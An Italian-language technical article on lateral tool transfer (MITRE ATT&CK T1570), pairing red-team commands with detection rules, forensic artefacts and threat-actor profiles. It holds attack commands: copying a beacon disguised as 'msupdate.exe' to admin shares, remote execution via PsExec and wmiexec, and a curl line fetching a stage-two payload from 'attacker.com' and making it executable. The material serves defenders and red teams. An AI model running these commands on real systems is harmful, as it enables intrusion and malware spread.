Trasferimento Laterale di Tool: Lateral Tool Transfer (T1570)

La simulazione del trasferimento laterale inizia con l'utilizzo dei protocolli nativi Windows. Il comando più immediato sfrutta le share amministrative:

copy C:\tools\beacon.exe \target-host\C$\Windows\Temp\msupdate.exe

Per ambienti Linux, rsync offre capacità di trasferimento silenzioso:

rsync -avz --progress /tmp/implant.elf user@192.168.1.50:/tmp/.cache/

Gli attaccanti sofisticati come APT41 combinano spesso PsExec con trasferimenti remoti. La sequenza operativa prevede prima il trasferimento del payload, poi l'esecuzione remota tramite psexec \target-host -c payload.exe.

Impacket rappresenta lo strumento di riferimento per operazioni cross-platform. Il modulo wmiexec permette trasferimento ed esecuzione in un'unica operazione:

wmiexec.py domain/user:password@target-host "cmd.exe /c copy \\attacker\share\tool.exe C:\Windows\Temp"

Per ambienti ESXi, UNC3886 ha dimostrato l'efficacia degli script Python per il trasferimento tra host e VM guest. La tecnica sfrutta le API native VMware per caricare file direttamente nei datastore.

Le operazioni su macOS richiedono attenzione particolare ai meccanismi di sicurezza. Il comando curl -s https://attacker.com/stage2 -o /tmp/.update && chmod +x /tmp/.update rappresenta un pattern comune, mascherando il trasferimento come aggiornamento legittimo.

Durante i red team engagement, la combinazione di certutil per il download iniziale seguito da propagazione SMB replica efficacemente i TTP osservati in campagne reali come Operation Wocao.

La detection efficace richiede correlazione tra eventi di trasferimento file e successive esecuzioni. Gli EventCode chiave in ambiente Windows includono 4663 per accessi a oggetti file e 4688 per creazione processi.

Il pattern comportamentale da monitorare prevede scritture remote su share amministrative seguite da esecuzione entro 5 minuti. Query Splunk esempio:

index=windows EventCode=5145 Share_Name="$" | join host [search index=windows EventCode=4688 | where _time > relative_time(now(), "-5m")]*

Per Linux, auditd cattura trasferimenti sospetti monitorando syscall come sendfile e write. La configurazione deve includere:

-w /usr/bin/scp -p x -k lateral_transfer -w /usr/bin/rsync -p x -k lateral_transfer

I falsi positivi derivano principalmente da software di deployment legittimo come PDQ Deploy. La baseline deve escludere account di servizio autorizzati e percorsi di deployment standard.

Medusa Group ha dimostrato come tool legittimi possano mascherare attività malevole. Il SOC deve implementare whitelist dinamiche basate su hash binari approvati, non solo su nomi processi.

Per ambienti ESXi, il monitoraggio dei log vmkernel per upload datastore anomali rappresenta un indicatore critico spesso trascurato.

L'analisi forense del trasferimento laterale inizia con l'identificazione degli artefatti di trasferimento nei log SMB. Il registro Security contiene tracce dettagliate di ogni accesso remoto a share amministrative.

La timeline reconstruction richiede correlazione tra:

• Prefetch files che mostrano esecuzione di tool di trasferimento
• USN Journal che documenta creazione file in directory temporanee
• ShimCache che conferma esecuzione dei binari trasferiti

Sandworm Team durante l'attacco alla rete elettrica ucraina del 2022 ha utilizzato GPO per distribuire CaddyWiper. Gli artefatti SYSVOL mostravano chiaramente i timestamp di modifica delle policy e i file msserver.exe copiati.

Su sistemi Linux, l'analisi di .bash_history spesso rivela comandi di trasferimento non mascherati. La correlazione con auth.log fornisce il contesto temporale e l'identità dell'attaccante.

Gli artefatti di Wizard Spider mostrano pattern ricorrenti: copie iniziali nella directory %TEMP% dei domain controller, seguito da distribuzione massiva via SYSVOL. L'analisi del $MFT permette ricostruzione precisa della sequenza temporale.

Per investigazioni su ransomware come BlackCat, il focus deve essere sui lateral movement rapidi pre-encryption. I Volume Shadow Copy possono contenere versioni precedenti dei file trasferiti prima della cifratura.

Turla rappresenta l'eccellenza nel trasferimento laterale stealth, utilizzando backdoor RPC custom per movimenti inter-rete. Il gruppo favorisce infrastrutture di staging intermedie, mai trasferimenti diretti da C2 a target finale.

APT32 segue pattern prevedibili: deployment di Meterpreter dopo movimento laterale con account amministrativi compromessi. La loro preferenza per staging in directory di sistema legittime facilita l'identificazione di potenziali target successivi.

Volt Typhoon ha innovato con trasferimenti di web shell tra server, indicando shift verso persistenza distribuita. Il gruppo evita tool tradizionali, preferendo living-off-the-land per ridurre l'impronta forense.

L'overlap tooling tra GALLIUM e altri attori cinesi mostra convergenza su PsExec per lateral movement. Questo suggerisce infrastrutture condivise o playbook standardizzati tra unità operative.

Le campagne HomeLand Justice dimostrano evoluzione tattica: da trasferimenti manuali a distribuzione automatizzata via GPO. Il trend indica maggiore automazione e velocità nelle operazioni future.

Storm-1811 rappresenta la nuova generazione: Impacket come strumento primario, indicando professionalizzazione degli attori ransomware. La previsione è convergenza verso framework modulari per trasferimento e esecuzione combinati.

Analisi basata su framework MITRE ATT&CK T1570, documentazione campagne Operation Wocao, 2022 Ukraine Electric Power Attack, HomeLand Justice. Riferimenti detection strategy DET0183 per correlazione cross-platform.